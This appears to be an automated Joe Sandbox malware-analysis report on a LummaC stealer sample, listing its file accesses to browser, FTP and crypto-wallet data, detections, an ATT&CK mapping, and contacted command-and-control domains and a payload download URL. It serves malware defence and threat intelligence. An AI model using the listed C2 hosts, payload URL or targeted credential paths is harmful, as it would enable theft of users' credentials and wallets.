Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2243914715.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2244360588.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2241532296.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2241346372.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2224940192.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2243100835.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2242110728.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2241837316.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2243652288.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2244321003.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2242494146.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2242781558.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2243383940.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	1 Masquerading	2 OS Credential Dumping	761 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	41 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	41 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	2 Bypass User Account Control	361 Virtualization/Sandbox Evasion	Security Account Manager	361 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Bypass User Account Control	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	39%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	49%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
necklacedmny.store	11%	Virustotal	Browse
presticitpo.store	1%	Virustotal	Browse
fadehairucw.store	1%	Virustotal	Browse
thumbystriw.store	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
necklacedmny.store	188.114.96.3	true	true	11%, Virustotal, Browse	unknown
presticitpo.store	unknown	unknown	true	1%, Virustotal, Browse	unknown
thumbystriw.store	unknown	unknown	true	1%, Virustotal, Browse	unknown
crisiwarny.store	unknown	unknown	true		unknown
fadehairucw.store	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
https://necklacedmny.store/api	true	unknown
presticitpo.store	true	unknown
scriptyprefej.store	true	unknown
necklacedmny.store	true	unknown
fadehairucw.store	true	unknown
navygenerayk.store	true	unknown
founpiuer.store	true	unknown
thumbystriw.store	true	unknown
crisiwarny.store	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.microsoft	file.exe, 00000000.00000003.2303438782.0000000000C35000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/apiO	file.exe, 00000000.00000003.2355875043.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356474234.0000000000C65000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://necklacedmny.store/d	file.exe, 00000000.00000003.2277317516.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2303633690.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2226199144.0000000005507000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/l	file.exe, 00000000.00000003.2356210334.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2363459732.0000000000C53000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/	file.exe, 00000000.00000002.2361476946.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/	file.exe, 00000000.00000003.2242781558.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2363459732.0000000000C53000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://necklacedmny.store/T	file.exe, 00000000.00000003.2277317516.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/off/def.exe	file.exe, 00000000.00000002.2363227484.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2226199144.0000000005507000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.mozilla.or	file.exe, 00000000.00000003.2226103653.000000000520E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/off/def.exee	file.exe, 00000000.00000002.2363227484.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	necklacedmny.store	European Union		13335	CLOUDFLARENETUS	true
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544265
Start date and time:	2024-10-29 06:58:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@5/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 2748 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:59:07	API Interceptor	10x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/jI82Ms6K/download
	9D7RwuJrth.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
	DBUfLVzZhf.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	R5AREmpD4S.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	7950COPY.exe	Get hash	malicious	FormBook	Browse	www.globaltrend.xyz/b2h2/
	transferencia interbancaria_667553466579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/Gitmx
	19387759999PO-RFQ-INVOICE-doc.exe	Get hash	malicious	FormBook	Browse	www.zonguldakescortg.xyz/483l/
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/876i/
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.fnsds.org/
	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	dddotx.shop/Mine/PWS/fre.php
185.215.113.16	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
necklacedmny.store	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://iqzvfstfgkhjbcqj.pretest.com.br/fnjsagvklebfioyedsh/nfsavlkwhjvfedklhdf/fadkhvgqeuklhteiupog/sj.kim5@hdel.co.kr	Get hash	malicious	Phisher	Browse	172.67.161.254
	http://prabal-gupta-lcatterton-com.athuselevadores.com.br/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://apollomicsinc-my.sharepoint.com/:u:/p/peony_yu/EThcAjzaTWNPs4NpIP1X0v0BUe4pmKNB9s6TANBDk5EDeA?rtime=8VndtY_33Eg	Get hash	malicious	HtmlDropper	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	162.159.134.233
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Salary_Structure_Benefits_for_Sebastien.daveauIyNURVhUTlVNUkFORE9NMTkjIw==.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
